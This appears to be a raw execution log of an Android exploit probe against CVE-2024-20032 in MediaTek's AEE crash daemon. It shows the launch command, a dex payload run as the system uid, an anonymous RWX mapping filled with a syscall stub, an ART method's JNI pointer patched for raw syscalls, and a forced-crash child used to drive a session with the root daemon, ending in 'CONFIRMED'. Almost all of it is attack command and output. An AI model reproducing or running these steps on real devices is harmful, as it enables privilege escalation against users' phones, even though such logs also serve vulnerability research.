command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=11 --class=3 --crash-child
probe=aee-session
dex_md5=6c0ffc31feb043af02b93c37b8a8087e
dex_sha256=36e7db9a1130613961ffbfc6dd9bcb61df22cd87d3b42716697ba1f981995521
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
6c0ffc31feb043af02b93c37b8a8087e  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[crash_child] sh -c 'kill -SEGV $$' → pid=24962 exited=true
[+] 崩溃子进程 PID=24962，等待 500ms...
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=24948 target_pid=24962 class=3 ind=11 flags=0x0 payload=true
[+] Scratch buffer at 0x79532a6000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x79532a5000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x794ec12c78
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x76a061a2c0
    entry_point    = 0x103800087607c568
[*] Patching data_ (JNI) → 0x79532a5000
    data_       = 0x79532a5000 ✓
    entry_point = 0x103800087607c568 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=11 class=3 pid=24962 flags=0x0 payload=18
[session] IND bytes: 02 00 00 00 0b 00 00 00 82 61 00 00 03 00 00 00 12 00 00 00 00 00 00 00
[session] REQ#0 type=0 cmd=3(REQ_PROCESS) seq=-1 payload=0
[session] REQ#1 type=0 cmd=2(REQ_TYPE) seq=0 payload=0
[session] REQ#2 type=0 cmd=3(REQ_PROCESS) seq=1 payload=0
[session] REQ#3 type=0 cmd=4(REQ_MODULE) seq=2 payload=0
[session] REQ#4 type=0 cmd=43(REQ_TRIG_TIME) seq=3 payload=0
[session] REQ#5 type=0 cmd=5(REQ_BACKTRACE) seq=4 payload=0
[session] REQ#6 type=2 cmd=16(IND_LOG_CLOSE) seq=0 payload=0
[session] daemon IND cmd=16(IND_LOG_CLOSE) — session CLOSED
[session] *** SUCCESS: 6 REQ/RSP exchanges on @com.mtk.aee.aed_64 ***
[result] CVE_2024_20032=CONFIRMED — system_app drove full session with root aee daemon

[phase-check] /data/vendor/aee_exp/
[aee_exp] 开始轮询，等待 aee_dumpstate 写入（最多40秒）...
[aee_exp] 40秒后仍为空
[result] DUMP_WRITTEN=NO — aee_dumpstate 可能因目标进程未真实崩溃而中止写入
